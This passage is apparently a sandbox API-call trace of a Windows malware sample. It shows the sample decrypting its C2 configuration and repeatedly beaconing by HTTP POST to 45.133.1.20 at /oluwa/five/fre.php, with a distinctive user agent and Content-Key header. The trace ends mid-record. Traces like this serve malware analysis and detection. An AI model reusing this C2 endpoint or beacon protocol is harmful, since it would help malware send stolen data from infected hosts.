(pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0188.109] GetProcessHeap () returned 0x6a0000 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0188.109] GetProcessHeap () returned 0x6a0000 [0188.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0188.110] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.111] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.111] GetProcessHeap () returned 0x6a0000 [0188.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0188.111] GetProcessHeap () returned 0x6a0000 [0188.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.111] GetProcessHeap () returned 0x6a0000 [0188.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0188.112] GetProcessHeap () returned 0x6a0000 [0188.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0188.112] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.113] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.113] GetProcessHeap () returned 0x6a0000 [0188.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0188.113] GetProcessHeap () returned 0x6a0000 [0188.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.114] send (s=0x210, buf=0x6b5c98*, len=242, flags=0) returned 242 [0188.115] send (s=0x210, buf=0x6bb998*, len=159, flags=0) returned 159 [0188.115] GetProcessHeap () returned 0x6a0000 [0188.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0188.115] recv (in: s=0x210, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0188.187] GetProcessHeap () returned 0x6a0000 [0188.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0188.189] GetProcessHeap () returned 0x6a0000 [0188.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0188.190] GetProcessHeap () returned 0x6a0000 [0188.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0188.190] GetProcessHeap () returned 0x6a0000 [0188.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0188.191] closesocket (s=0x210) returned 0 [0188.193] GetProcessHeap () returned 0x6a0000 [0188.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0188.193] GetProcessHeap () returned 0x6a0000 [0188.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.194] GetProcessHeap () returned 0x6a0000 [0188.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0188.194] GetProcessHeap () returned 0x6a0000 [0188.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0188.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11b0) returned 0x210 [0188.197] Sleep (dwMilliseconds=0xea60) [0188.198] GetProcessHeap () returned 0x6a0000 [0188.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0188.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0188.231] GetProcessHeap () returned 0x6a0000 [0188.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.232] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0188.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.233] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.234] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.235] GetProcessHeap () returned 0x6a0000 [0188.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.236] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0188.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.238] CryptDestroyKey (hKey=0x6ad020) returned 1 [0188.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.244] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0188.244] GetProcessHeap () returned 0x6a0000 [0188.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.245] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.246] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.247] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.248] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.248] GetProcessHeap () returned 0x6a0000 [0188.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0188.248] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.249] GetProcessHeap () returned 0x6a0000 [0188.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0188.249] GetProcessHeap () returned 0x6a0000 [0188.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.249] GetProcessHeap () returned 0x6a0000 [0188.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0188.250] GetProcessHeap () returned 0x6a0000 [0188.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0188.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.251] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0188.265] GetProcessHeap () returned 0x6a0000 [0188.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.267] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.268] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.269] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.270] GetProcessHeap () returned 0x6a0000 [0188.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.271] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0188.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.273] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.276] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0188.276] GetProcessHeap () returned 0x6a0000 [0188.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0188.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.281] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0188.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0188.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.286] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0188.286] GetProcessHeap () returned 0x6a0000 [0188.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0188.286] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0188.286] GetProcessHeap () returned 0x6a0000 [0188.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0188.286] socket (af=2, type=1, protocol=6) returned 0x240 [0188.286] connect (s=0x240, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0188.311] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0188.311] GetProcessHeap () returned 0x6a0000 [0188.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0188.311] GetProcessHeap () returned 0x6a0000 [0188.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0188.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.313] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.313] GetProcessHeap () returned 0x6a0000 [0188.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0188.313] GetProcessHeap () returned 0x6a0000 [0188.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.314] GetProcessHeap () returned 0x6a0000 [0188.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0188.314] GetProcessHeap () returned 0x6a0000 [0188.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0188.314] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.315] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.315] GetProcessHeap () returned 0x6a0000 [0188.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0188.315] GetProcessHeap () returned 0x6a0000 [0188.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.316] send (s=0x240, buf=0x6b5c98*, len=242, flags=0) returned 242 [0188.318] send (s=0x240, buf=0x6bb998*, len=159, flags=0) returned 159 [0188.319] GetProcessHeap () returned 0x6a0000 [0188.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0188.319] recv (in: s=0x240, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0188.400] GetProcessHeap () returned 0x6a0000 [0188.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0188.400] GetProcessHeap () returned 0x6a0000 [0188.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0188.401] GetProcessHeap () returned 0x6a0000 [0188.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0188.401] GetProcessHeap () returned 0x6a0000 [0188.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0188.401] closesocket (s=0x240) returned 0 [0188.402] GetProcessHeap () returned 0x6a0000 [0188.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0188.402] GetProcessHeap () returned 0x6a0000 [0188.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.403] GetProcessHeap () returned 0x6a0000 [0188.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0188.403] GetProcessHeap () returned 0x6a0000 [0188.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0188.404] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11b4) returned 0x240 [0188.405] Sleep (dwMilliseconds=0xea60) [0188.407] GetProcessHeap () returned 0x6a0000 [0188.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0188.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.415] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0188.424] GetProcessHeap () returned 0x6a0000 [0188.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.425] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.426] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.430] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.430] GetProcessHeap () returned 0x6a0000 [0188.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.432] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0188.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.433] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.435] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0188.435] GetProcessHeap () returned 0x6a0000 [0188.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.436] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.437] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.447] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.447] GetProcessHeap () returned 0x6a0000 [0188.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0188.447] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.448] GetProcessHeap () returned 0x6a0000 [0188.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0188.448] GetProcessHeap () returned 0x6a0000 [0188.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.451] GetProcessHeap () returned 0x6a0000 [0188.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0188.452] GetProcessHeap () returned 0x6a0000 [0188.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0188.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0188.468] GetProcessHeap () returned 0x6a0000 [0188.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.469] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.470] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.474] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.474] GetProcessHeap () returned 0x6a0000 [0188.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.476] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0188.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.477] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.478] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0188.478] GetProcessHeap () returned 0x6a0000 [0188.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.479] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0188.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.480] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0188.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.481] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0188.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.482] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0188.482] GetProcessHeap () returned 0x6a0000 [0188.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0188.482] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0188.482] GetProcessHeap () returned 0x6a0000 [0188.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0188.482] socket (af=2, type=1, protocol=6) returned 0x468 [0188.485] connect (s=0x468, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0188.512] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0188.512] GetProcessHeap () returned 0x6a0000 [0188.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0188.512] GetProcessHeap () returned 0x6a0000 [0188.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0188.513] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.514] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: 